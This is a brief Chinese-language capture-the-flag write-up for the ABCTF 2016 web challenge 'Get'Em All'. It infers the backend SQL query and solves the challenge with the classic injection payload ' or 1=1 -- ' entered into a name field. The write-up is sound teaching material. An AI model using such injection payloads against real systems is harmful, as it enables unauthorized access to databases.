Press "Enter" to skip to content

[ABCTF]Get’Em All – 80

題目:

{ABCTF2016}[Web Exploitation]Get'Em All - 80

Hint:

None

解法:

進入網站後查看源始碼發現這麼一句

{ABCTF2016}[Web Exploitation]Get'Em All - 80

然而只有Luke有東西可看

{ABCTF2016}[Web Exploitation]Get'Em All - 80

這應該是SQL吧 , 它裡面的語句應該大約是這樣寫的

select * from whateverTable where name = 'Luke'

由此 , 我們可以嘗試

select * from whateverTable where name = '' or 1=1 -- '

結果成功了

{ABCTF2016}[Web Exploitation]Get'Em All - 80

Comments